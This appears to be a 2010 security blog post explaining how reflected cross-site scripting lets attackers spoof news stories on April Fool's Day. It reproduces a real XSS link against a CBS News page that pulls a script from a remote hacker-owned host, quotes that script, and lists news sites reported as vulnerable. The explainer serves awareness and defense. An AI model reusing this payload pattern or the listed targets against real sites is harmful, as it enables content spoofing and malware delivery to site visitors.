Submitted by Ryan Barnett 04/01/2010
Happy April Fool's Day Everyone! April 1st is traditionally a day for pranks and there is no doubt in my mind that we will all be flooded with all sorts of Content Spoofing types of fake news stories such as the one in the graphic on the right from the CBS News website whose headline read:
George Bush appoints a 9 year old to be the chairperson of the Information Security Department.
How are these attacks carried out? More often than not, attackers leverage reflective Cross-site Scripting vulnerabilities within news outlet's web applications so that if victims click on web links the spoofed data will appear. Here is what the XSS link looked like:
http://www.cbsnews.com/stories/2002/02/15/weather_local/main501644.shtml?zipcode=1--%3E%3Cscript%20src=http://www.securitylab. ru/test/sc.js%3E%3C/script%3E%3C!--
When the user sent this request to the website, the javascript payload executed within the victim's browser and requested the sc.js file on the remote, hacker-owned website. The contents of the sc.js file were:
document.write('<p align=left>Mon, 28 August 2006');
document.write('<p align=center><b>George Bush appoints a 9year old to be the chairperson… ');
document.write('<p>On Friday night, George Bush made... ');
document.write('<p>Michael Antipov was noticed by the FBI... ');
document.write('<p>Michael Antipov, sun of the top-secret... ');
document.write('<p>From now on the citizens of the USA can... ');
Cross-site Scripting vulnerabilities are found in just about every web application so the CBS News site example here is not unique. The XSSed website shows a number of news outlet sites vulnerable to this type of attack:
www.internetnews.com XSS vulnerability notified by nickhacks
search.news.cn XSS vulnerability notified by nicobar
www.newsmill.se XSS vulnerability notified by Uber0n
news.uchicago.edu XSS vulnerability notified by nopic01
www.pdenewsroom.state.pa.us XSS vulnerability notified by Mystick
novinnews.com XSS vulnerability notified by Pouya_Server
www.newscast.co.uk XSS vulnerability notified by Viper.aT
www.healthcareitnews.com XSS vulnerability notified by skathgh420
blognetnews.com XSS vulnerability notified by GTADarkDude
search.cyclingnews.com XSS vulnerability notified by Rohit Bansal
news.president.am XSS vulnerability notified by By_Cyber
www.recentnews.co.uk XSS vulnerability notified by austinator
media.49abcnews.com XSS vulnerability notified by xylitol
news.carnoc.com XSS vulnerability notified by xylitol
news.onekoreanews.net XSS vulnerability notified by Woo
newshub.tucows.com XSS vulnerability notified by DaiMon
www.newsvoyager.com XSS vulnerability notified by TheBig
www.hypernews.org XSS vulnerability notified by Mystick
newsroom.pse.com XSS vulnerability notified by LostBrilliance
news.mediamarkt.de XSS vulnerability notified by zrok
Keep in mind that XSS vulnerabilities can be leveraged in many different types of attack outcomes. In this case, we are talking about Content Spoofing of news stories however an attacker may also use the same attack vectors to try and install malware onto victim's computers.
Besides XSS vulnerabilities, Content Spoofing attacks can be carried out due to unauthorized access to web-based management interfaces. For example, there have been news stories of improperly configured proxy servers that allowed external clients to gain access to the the internal network. This in turn allowed them access to web-based news submittal applications. This is exactly what happened where hacker Adrian Lamo posted fake news stories on Yahoo's website.
No comments:
Post a Comment